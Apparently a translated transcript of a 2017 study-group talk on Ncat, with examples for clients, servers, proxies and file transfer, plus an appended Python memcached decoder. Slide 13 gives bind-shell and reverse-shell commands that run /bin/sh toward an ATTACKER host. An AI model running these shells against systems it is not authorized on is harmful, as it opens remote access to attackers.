Use Ncat

Nagaoka IT Developers Study Group, 52nd meeting

Hayato Imai

June 17, 2017

Transcript

  1. Use Ncat
    Nagaoka IT Developers Study Group, 52nd meeting
    Netcat

  2. Self-introduction
    - Hayato Imai
    - @hayajo
    - Works on infrastructure

  3. Netcat

  4. What is Netcat?
    - The nc command
    - The Swiss Army knife of networking
    - A multipurpose network utility
    - Handles the TCP/UDP protocols
    - The network version of cat

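  5. The various Netcats (nc)

    Original | v… | Ubuntu
    GNU version | compatible with the original | Arch (extra)
    OpenBSD version | IPv6 and UDS support; command execution not supported | CentOS, OS X
    Nmap version (Ncat) | SSL support, feature-rich | CentOS (nc@ncat)
    busybox version | almost the same as the GNU version | BusyBox, Alpine

    This talk introduces Ncat (ncat), the Nmap version of Netcat.
    https://nmap.org/ncat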

  6. How to use Ncat (ncat)

  7. Client
    HTTP client
    $ ncat -C example.com 80

    Memcache client (ASCII)
    $ ncat -C HOST 11211

    Memcache client (BINARY)
    $ perl -e 'print "\x80\x00\x00\x05" . "\x00"x4 .
    "\x00\x00\x00\x05" . "\x00"x12 . "\x68\x65\x6c\x6c\x6f"' |\
    > ncat HOST 11211 |\
    > hexdump -C

  8. Server

    Chat server (broker)
    SERVER$ ncat -l --broker
    HOST1$ ncat SERVER
    HOST2$ ncat SERVER

    Chat server (chat)
    SERVER$ ncat -l --chat
    HOST1$ ncat SERVER
    HOST2$ ncat SERVER

    Chat server
    SERVER$ ncat -l # default port 31337
    HOST1$ ncat SERVER

  9. Server

    Web server
    SERVER$ ncat -l 8080 -k \
    > --sh-exec \
    > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html"
    CLIENT$ curl http://SERVER:8080

    Web server (SSL)
    SERVER$ ncat --ssl -l 8443 -k \
    > --sh-exec \
    > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html"
    CLIENT$ curl -k https://SERVER:8443

  10. Proxy

    HTTP proxy
    PROXY$ ncat -l 8080 \
    > --proxy-type http --proxy-auth user:pass
    CLIENT$ curl -v https://example.com \
    > --proxy PROXY:8080 --proxy-user user:pass

    Protocol conversion (HTTP/HTTPS)
    PROXY$ ncat -l 1883 -k \
    > --sh-exec 'ncat --ssl -i 3 test.mosquitto.org 8883'
    CLIENT$ MQTT_HOST=PROXY MQTT_PORT=1883 mqttcli sub -t "#"

    SSL offload
    PROXY$ ncat --ssl -l 8443 -k \
    > --sh-exec 'ncat -i 3 -C localhost 3000'
    CLIENT$ curl -k https://PROXY:8443

  11. Proxy

    Connection pooling
    PROXY$ mkfifo f
    PROXY$ ncat -l 8080 -k <f | \
    > while true; do \
    > openssl s_client -connect example.com:443 -quiet >f 2>/dev/null; \
    > done
    $ httpstat https://example.com/
    ...
    DNS Lookup TCP Connection TLS Handshake Server Processing Content Transfer
    [ 6ms | 96ms | 371ms | 96ms | 1ms ]
    | | | | |
    namelookup:6ms | | | |
    connect:102ms | | |
    pretransfer:473ms | |
    starttransfer:569ms |
    total:570ms
    $ httpstat http://PROXY:8080 -H 'Host: example.com'
    ...
    DNS Lookup TCP Connection Server Processing Content Transfer
    [ 5ms | 0ms | 98ms | 0ms ]
    | | | |
    namelookup:5ms | | |
    connect:5ms | |
    starttransfer:103ms |
    total:103ms


  12. File transfer
    Client-to-server transfer
    SERVER$ ncat -l 8080 --recv-only >out.file
    CLIENT$ ncat --send-only SERVER 8080

    Server-to-client transfer
    SERVER$ ncat -l 8080 --send-only
    CLIENT$ ncat --recv-only SERVER 8080 >out.file

    SSL transfer (client-to-server transfer)
    SERVER$ ncat --ssl -l 8080 --recv-only >out.file
    CLIENT$ ncat --ssl --send-only SERVER 8080

  13. Backdoor
    When the target is directly reachable
    TARGET$ ncat -l --exec /bin/sh 8080
    ATTACKER$ ncat TARGET 8080

    When the target is behind NAT
    ATTACKER$ ncat -l 8080
    TARGET$ ncat --exec /bin/sh ATTACKER 8080

  14. Access control
    Allow
    $ ncat -l 8080 --allow 10.0.0.2

    Deny
    $ ncat -l 8080 --deny 10.0.0.0/8

    If both are specified, deny takes precedence.

  15. Summary

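  16. Summary
    - There are several implementations of the Netcat command
    - Ncat is feature-rich and actively developed, so it is the one to recommend
    - With a little imagination it can be used in many different ways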
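The bytes that slide 7 pipes into ncat for the binary Memcache client are a 24-byte memcached binary-protocol header followed by the key "hello". The following is an added example, not part of the original slides: it rebuilds that request field by field and decodes a response packet the way you would read it from the `hexdump -C` output. The function names are illustrative and the two sample responses are constructed, not captured from a server.

```python
import struct

# memcached binary protocol: fixed 24-byte header, network byte order.
# magic, opcode, key length, extras length, data type, vbucket id (request)
# or status (response), total body length, opaque, CAS.
HEADER = struct.Struct("!BBHBBHIIQ")
REQ_MAGIC, RES_MAGIC, OP_GET = 0x80, 0x81, 0x00
STATUS = {0x0000: "No error", 0x0001: "Key not found"}


def build_get(key: bytes) -> bytes:
    """Return a binary GET request: 24-byte header followed by the key."""
    return HEADER.pack(REQ_MAGIC, OP_GET, len(key), 0, 0, 0, len(key), 0, 0) + key


def parse_response(data: bytes) -> dict:
    """Split one response packet into header fields, extras, key and value."""
    if len(data) < HEADER.size:
        raise ValueError("short packet: need a 24-byte header")
    magic, opcode, klen, elen, _dtype, status, blen, opaque, cas = HEADER.unpack_from(data)
    if magic != RES_MAGIC:
        raise ValueError(f"unexpected magic byte 0x{magic:02x}")
    body = data[HEADER.size:HEADER.size + blen]
    if len(body) != blen or elen + klen > blen:
        raise ValueError("body length does not match header")
    return {
        "opcode": opcode,
        "status": STATUS.get(status, f"0x{status:04x}"),
        "extras": body[:elen],            # for a GET hit: 4 bytes of item flags
        "key": body[elen:elen + klen],
        "value": body[elen + klen:],
        "opaque": opaque,
        "cas": cas,
    }


# The bytes emitted by the perl one-liner on slide 7.
SLIDE_REQUEST = (b"\x80\x00\x00\x05" + b"\x00" * 4 + b"\x00\x00\x00\x05"
                 + b"\x00" * 12 + b"hello")

# Constructed sample responses (not captured from a real server).
HIT = HEADER.pack(RES_MAGIC, OP_GET, 0, 4, 0, 0x0000, 9, 0, 1) + b"\x00" * 4 + b"world"
MISS = HEADER.pack(RES_MAGIC, OP_GET, 0, 0, 0, 0x0001, 9, 0, 0) + b"Not found"

if __name__ == "__main__":
    print(build_get(b"hello") == SLIDE_REQUEST)
    print(parse_response(HIT))
    print(parse_response(MISS))
```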